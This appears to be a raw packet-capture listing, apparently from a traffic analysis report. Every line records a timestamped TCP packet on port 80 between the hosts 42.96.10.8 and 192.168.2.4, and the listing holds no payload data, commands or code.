                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208277941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208302975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214411974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214421988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214432001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214441061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214451075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214456081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214484930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214559078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214589119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214596987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214622974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214670897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214689016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214696884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214709997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.214721918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.234792948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.234802961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.234812975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.234821081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.234827042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.234833956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.234864950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237812042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237854958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237864971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237876892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237895012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237958908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237968922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237977028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237987041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.237996101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238002062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238012075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238054037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238065004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238074064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238084078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238095045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238121986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238133907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238142014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238151073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238161087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238168001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238171101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238182068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238183022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238190889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238198996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238203049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238217115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238221884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238279104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238290071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238302946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238318920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238396883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238406897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238415956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238425016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238437891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238454103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238491058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238501072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238508940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238517046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238524914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238528967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238538980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238548994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238559008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238567114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238567114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238584995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238806009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238845110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238862991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238955975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238965034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238985062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238991022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.238996029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239008904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239018917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239023924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239039898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239104986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239115953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239145994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239176035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239186049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239195108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239206076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239216089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239228010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239283085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239293098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239300966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239324093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239331007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239336967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239420891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239428997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239438057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239447117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239454985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239459038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239465952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239475965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239487886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239507914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239516973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239540100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239706039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239742041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239744902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239756107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239764929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239778996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239841938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239881039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239901066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239911079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239921093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239928007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239955902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239965916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239985943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.239995003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240004063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240035057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240211964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240221977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240231991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240253925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240271091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240386009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240411043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240421057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240441084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240463972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240499973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240571022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240581036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240586042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240593910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240605116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240607977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240617037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240626097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240632057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240637064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240643978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240645885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240657091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240669966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240691900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240820885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240832090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240839958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240863085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240886927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240896940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240912914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240921974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240928888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240931988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240945101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240946054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240957022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240969896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.240993977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241049051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241058111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241069078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241077900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241096020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241111994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241125107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241137028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241144896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241153955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241163969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241168022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241200924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241230011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241239071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241255045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241264105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241271019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241297960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241326094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241334915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241352081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241359949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241365910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241368055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241394043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241586924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241596937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241605997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241616964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241626024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241633892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241638899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241647005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241653919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241662025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241668940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241678953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241688013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241697073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241703987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241704941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241717100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241717100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241729021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241734028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241753101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241758108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241765022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241775990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241785049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241797924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241803885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241810083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241821051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241827965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241830111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241839886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241844893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241852045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241862059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241868019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241882086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241882086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241894960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241915941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241938114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241947889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241956949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.241977930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242001057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242003918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242013931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242049932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242055893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242067099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242095947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242120028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242129087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242137909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242145061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242166042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242177963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242182970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242197037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242207050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242238998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242352962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242362022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242371082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242386103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242403984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242486000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242496967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242506027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242516994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242527962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242530107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242537022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242556095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242567062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242645025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242697001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242706060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242739916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242747068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242778063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242825985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242839098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242866039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242887020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242897034 CET804973342.96.10.8192.168.2.4
